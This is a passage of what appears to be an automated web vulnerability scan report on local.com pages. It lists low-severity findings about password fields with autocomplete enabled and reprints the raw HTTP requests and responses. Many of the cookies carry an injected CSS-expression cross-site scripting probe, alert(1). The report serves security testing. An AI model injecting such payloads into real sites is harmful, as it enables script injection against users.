SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28952
Date: Thu, 03 Feb 2011 16:53:12 GMT
Content-Length: 28952
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Frequently Asked Qu
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.27. http://www.local.com/privacy/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /privacy/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 50592
Date: Thu, 03 Feb 2011 16:51:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 50592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Privacy Policy</tit
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.28. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130109
Date: Thu, 03 Feb 2011 15:55:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=2q4batq1irqnjjzf5gpd3v55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=9e9962ee-715a-422c-a9da-c41c1b56ab77&expdate=634349085044720371&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:04 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183044720371; domain=local.com; expires=Thu, 03-Feb-2011 16:25:04 GMT; path=/
Content-Length: 130109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.29. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 74200
Date: Thu, 03 Feb 2011 15:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=wu21mu55lor2xjbsdwrsmh45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=1c5b338d-bcdd-44ba-b370-36f6691769b8&expdate=634349085027409460&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:02 GMT; path=/
Content-Length: 74200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.30. http://www.local.com/results/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 133026
Date: Thu, 03 Feb 2011 16:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 133026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.31. http://www.local.com/results/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /results/?keyword=american+restaurants&location=dallas%2c+tx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 126417
Date: Thu, 03 Feb 2011 16:50:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:39 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=american+restaurants&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+american+restaurants+in+Dallas%2c+TX|serp|%2fresults%2f%3fkeyword%3damerican%2brestaurants%26location%3ddallas%252c%2btx~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=american+restaurants|Dallas%2c+TX~banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 126417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX american restauran
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.32. http://www.local.com/sitemap.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 29850
Date: Thu, 03 Feb 2011 16:53:24 GMT
Content-Length: 29850
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.33. http://www.local.com/sitemap/chicago-il.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/chicago-il.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap/chicago-il.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130753
Date: Thu, 03 Feb 2011 16:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 130753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Chicago, IL Local Business Se
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.34. http://www.local.com/sitemap/los-angeles-ca.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/los-angeles-ca.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap/los-angeles-ca.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 132986
Date: Thu, 03 Feb 2011 16:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Los Angeles, CA Local Busines
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.35. http://www.local.com/sitemap/new-york-ny.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /sitemap/new-york-ny.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap/new-york-ny.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
